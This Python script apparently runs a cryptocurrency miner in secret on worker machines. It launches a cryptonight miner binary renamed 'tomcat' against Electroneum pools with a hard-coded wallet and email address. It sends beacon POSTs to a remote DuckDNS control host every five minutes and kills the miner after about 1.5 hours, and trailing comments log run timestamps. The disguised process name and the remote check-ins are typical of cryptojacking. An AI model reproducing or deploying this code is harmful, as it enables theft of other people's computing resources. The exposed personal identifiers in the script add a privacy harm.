import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:17:01.839090
#2018-02-17 16:04:04.995835
#2018-02-17 17:53:02.007811
#2018-02-17 19:38:07.851384
#2018-02-17 21:26:04.236394
#2018-02-17 23:10:01.985057
#2018-02-18 00:57:07.284888
#2018-02-18 02:45:06.880093
#2018-02-18 04:34:04.103132
#2018-02-18 06:25:08.146394
#2018-02-18 08:13:06.190826
#2018-02-18 10:01:05.148959
#2018-02-18 11:48:05.712001
#2018-02-18 13:33:05.479595
#2018-02-18 15:23:02.165426
#2018-02-18 17:13:06.316669
#2018-02-18 19:01:05.599979
#2018-02-18 20:48:02.008709
#2018-02-18 22:35:03.973144
#2018-02-19 00:23:04.044421
#2018-02-19 02:09:01.792189
#2018-02-19 03:56:01.515217
#2018-02-19 05:40:04.399604
#2018-02-19 07:28:04.171395
#2018-02-19 09:17:07.751848
#2018-02-19 11:06:05.410088
#2018-02-19 12:54:04.680942
#2018-02-19 14:43:01.331537
#2018-02-19 16:32:01.260985
#2018-02-19 18:18:01.562973
#2018-02-19 20:04:07.222286
#2018-02-19 21:54:08.850751
#2018-02-19 23:39:06.126576
#2018-02-20 01:26:01.303895
#2018-02-20 03:14:07.122303
#2018-02-20 05:01:05.585016
#2018-02-20 06:43:01.574650
#2018-02-20 08:28:01.796438
#2018-02-20 10:13:03.678515
#2018-02-20 11:57:08.514185
#2018-02-20 13:44:01.880406
#2018-02-20 15:29:09.843289
#2018-02-20 17:14:09.320421
#2018-02-20 19:04:11.068471
#2018-02-20 20:52:01.289659
#2018-02-20 22:36:06.296306
#2018-02-21 00:17:05.954116
#2018-02-21 02:05:07.046902
#2018-02-21 03:51:06.449340
#2018-02-21 05:38:01.308348
#2018-02-21 07:26:09.965398
#2018-02-21 09:11:06.528444
#2018-02-21 11:00:12.084304
#2018-02-21 12:46:08.253176
#2018-02-21 14:36:01.361958
#2018-02-21 16:22:07.707397
#2018-02-21 18:12:09.265423
#2018-02-21 19:58:08.181560
#2018-02-21 21:45:04.078876
#2018-02-21 23:42:03.589551
#2018-02-22 01:31:05.782160
#2018-02-22 03:19:07.454457
#2018-02-22 05:06:03.727200
#2018-02-22 06:49:02.137567
#2018-02-22 08:37:07.058073
#2018-02-22 10:24:05.304289
#2018-02-22 12:09:10.423092
#2018-02-22 13:54:05.959125
#2018-02-22 15:41:11.161990
#2018-02-22 17:28:09.820940
#2018-02-22 19:17:09.794179
#2018-02-22 21:08:01.878986
#2018-02-22 22:52:09.304561
#2018-02-23 00:40:12.571409
#2018-02-23 02:28:05.996299
#2018-02-23 04:16:01.635402
#2018-02-23 06:04:01.839974
#2018-02-23 07:52:06.878095
#2018-02-23 10:08:09.318802
#2018-02-23 12:01:05.887081
#2018-02-23 13:48:12.834911
#2018-02-23 15:38:09.343976
#2018-02-23 17:27:08.378024
#2018-02-23 19:14:01.700805
#2018-02-23 20:58:07.231224
#2018-02-23 22:44:07.334615
#2018-02-24 00:32:02.244323
#2018-02-24 02:23:06.735337
#2018-02-24 04:14:06.806549
#2018-02-24 06:02:07.432835
#2018-02-24 07:49:07.372695
#2018-02-24 09:34:06.048533
#2018-02-24 11:28:05.074435
#2018-02-24 13:17:05.134699
#2018-02-24 15:08:04.856506
#2018-02-24 16:57:05.066610
#2018-02-24 18:44:06.462613
#2018-02-24 20:35:07.803125
#2018-02-24 22:38:07.864803
#2018-02-25 01:45:05.410922
#2018-02-25 05:21:01.857191
#2018-02-25 11:34:05.533938